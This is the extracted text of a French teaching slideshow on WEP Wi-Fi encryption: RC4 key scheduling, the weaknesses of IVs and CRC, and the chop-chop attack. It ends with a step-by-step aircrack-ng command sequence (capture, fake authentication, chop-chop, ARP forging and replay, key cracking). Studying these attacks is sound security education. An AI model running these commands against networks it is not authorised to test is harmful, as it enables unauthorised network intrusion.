Clé WEP
AFIFI FAISSAL
• Type de réseau – LAN (Local Area Network)– MAN (Metropolitan Area network)– WAN (Wide Area Network)
• Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques– Standards 802.11
TCP/IP
WEP(Wired Equivalent Privacy)
• Qu’est ce que le WEP?– Fait partie de la norme internationale IEEE 802.11– Une solution de confidentialité équivalente à un réseau
filaire– Employé dans un WLAN pour :
» La confidentialité» L’authentification » L’intégrité
WEP(Wired Equivalent Privacy)
• Il est défini comme :– assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes– efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable– optionnel : l’utilisation du WEP est optionnel
Le chiffrement WEP
• Il repose sur l’algorithme à clé symétrique RC4• Le chiffrement se décompose en plusieurs
phases : – La création de la graine :IV+clé– La création du keystream – Le calcul ICV « Integrity Check Value »– La constitution du message final et son encapsulation dans
une trame
L’algorithme RC4 dans WEP
RC4– Symétrique– Chiffrement par flux– Différentes tailles de clé jusqu’à 256 bit– Il est extrêmement rapide
Fonctionement • On génère un flux de données de taille identique au
flux de données claires et on fait un XOR entre les deux
Initialisation de la clé
• Deux longueurs de clé WEP– Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits
GraineIV : vecteur d’initialisation est une séquence de bits qui change régulièrement
Table «S» initialisée
Mélange du tableau KSApour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour
Pseudo Random Generator Algorithm PRGA
Obtention du keystream =>
PRGA(T) :x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z]
Opérations de chiffrement et de déchiffrement
LES FAILLES DU WEP
• Social-Engineering
• cryptanalyse
Les principales failles du WEP sont essentiellement les suivantes :
• Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables.
• Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream.
• L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit.
• • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont
statiques .
• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)
Les faiblesses du IV
IV moins de 17 millions de combinaisons
forte possibilité de Collisions
Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)
Attaques contre le WEP
L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV• Le CRC permet de s’assurer de l’intégrité des données mais en
aucun cas de leur sécurité• L’attaque chop-chop va donc utiliser cette faiblesse pour
injecter des paquets sur le réseau.
Trame1 Trame 2
ajout 1 octet de données
Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
_____ DATA ___ ___ICV ___D0 D1 D2 D3 D4 I3 I2 I1 I0+ + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8= = = = = = = = =R0 R1 R2 R3 R4 R5 R6 R7 R8
_____ DATA ____ ___ICV ___D0 D1 D2 D3 D4 D5 J3 J2 J1 J0+ + + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8 K9= = = = = = = = = =S0 S1 S2 S3 S4 S5 S6 S7 S8 S9
Suite L’attaque chop-chop
scan des réseaux wifiairodump-ng -w out -c 10 --encrypt wep --bssid
00:16:41:C9:E0:3F wlan0
on se fait passer pour un client: fake authentification
aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38
L'attaque Chopchopaireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor
Forger un paquet ARP avec Packetforge-ngpacketforge-ng -0 -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap
L'injection: Aireplay-ng -3, arp replay#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h
00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0
Le crack de la clé wep avec Aircrack-ng#aircrack-ng out-01.cap
Attaques contre RC4
Implementation